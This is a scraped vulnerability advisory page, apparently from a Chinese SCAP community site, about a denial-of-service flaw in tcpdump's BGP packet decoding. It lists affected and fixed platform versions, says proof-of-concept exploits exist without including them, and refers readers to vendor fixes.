LBL tcpdump 3.5.2
LBL tcpdump 3.5 alpha
LBL tcpdump 3.5
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ FreeBSD FreeBSD 3.x
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7
LBL tcpdump 3.4
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
LBL libpcap 0.8.3
IPCop IPCop 1.4.6
IPCop IPCop 1.4.5
IPCop IPCop 1.4.4
IPCop IPCop 1.4.2
IPCop IPCop 1.4.1
IBM AIX 5.3 L
IBM AIX 5.3
Gentoo Linux
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.2.1 -RELEASE
FreeBSD FreeBSD 5.2 -RELENG
FreeBSD FreeBSD 5.2 -RELEASE
FreeBSD FreeBSD 5.2
FreeBSD FreeBSD 5.1 -RELENG
FreeBSD FreeBSD 5.1 -RELEASE/Alpha
FreeBSD FreeBSD 5.1 -RELEASE-p5
FreeBSD FreeBSD 5.1 -RELEASE
FreeBSD FreeBSD 5.1
FreeBSD FreeBSD 5.0 -RELENG
FreeBSD FreeBSD 5.0 -RELEASE-p14
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0

- 漏洞讨论

The 'tcpdump' utility is prone to a vulnerability that may allow a remote attacker to cause a denial-of-service condition in the software. The issue occurs because of the way tcpdump decodes Border Gateway Protocol (BGP) packets. A remote attacker may send malformed BGP packets to cause the software to enter an infinite loop and hang.

- 漏洞利用

The following proof-of-concept exploits are available:

- 解决方案

Please see the referenced vendor advisories for details on obtaining and applying fixes.


IBM AIX 5.3

LBL libpcap 0.8.3

IPCop IPCop 1.4.1

IPCop IPCop 1.4.2

IPCop IPCop 1.4.4

IPCop IPCop 1.4.5

IPCop IPCop 1.4.6

Mandriva Linux Mandrake 10.1

Mandriva Linux Mandrake 10.1 x86_64

Mandriva Linux Mandrake 10.2

Mandriva Linux Mandrake 10.2 x86_64

LBL tcpdump 3.7.2

LBL tcpdump 3.8.2

LBL tcpdump 3.8.3

LBL tcpdump 3.9.1

FreeBSD FreeBSD 5.3

IBM AIX 5.3 L

FreeBSD FreeBSD 5.3 -RELEASE

FreeBSD FreeBSD 5.3 -RELENG

FreeBSD FreeBSD 5.3 -STABLE

FreeBSD FreeBSD 5.4 -PRERELEASE

FreeBSD FreeBSD 5.4 -RELEASE

FreeBSD FreeBSD 5.4 -RELENG

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站